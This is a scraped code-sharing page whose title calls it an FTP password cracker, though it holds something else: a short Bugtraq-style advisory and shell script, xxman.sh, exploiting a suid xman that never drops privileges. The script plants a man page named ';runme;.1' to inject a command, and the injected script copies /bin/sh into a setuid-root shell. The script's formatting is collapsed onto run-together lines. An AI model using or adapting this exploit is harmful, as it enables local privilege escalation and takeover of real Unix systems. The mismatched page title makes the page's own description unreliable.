xxman.sh

来自「一个FTP密码破解程序的源代码」· Shell 代码 · 共 35 行

SH
35
字号
xman doesn't drop privileges anywheres in the program.  but, does support suid installation.  so, exploiting via a system call is much easier than thebuffer overflow in MANPATH, mentioned in another bugtraq posting.  here is an example of such anexploitation possibility:-- xxman.sh --#!/bin/sh# example of xman exploitation. xman# supports privileges.  but, never# drops them.# Vade79 -> v9@realhalo.org -> realhalo.org. MANPATH=~/xmantest/mkdir -p ~/xmantest/man1cd ~/xmantest/man1touch ';runme;.1'cat << EOF >~/xmantest/runme#!/bin/shcp /bin/sh ~/xmanshchown `id -u` ~/xmanshchmod 4755 ~/xmanshEOFchmod 755 ~/xmantest/runmeecho "click the ';runme;' selection," \"exit.  then, check for ~/xmansh."xman -bothshown -notopboxrm -rf ~/xmantest-- xxman.sh --Vade79 -> v9@realhalo.org -> realhalo.org. 

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?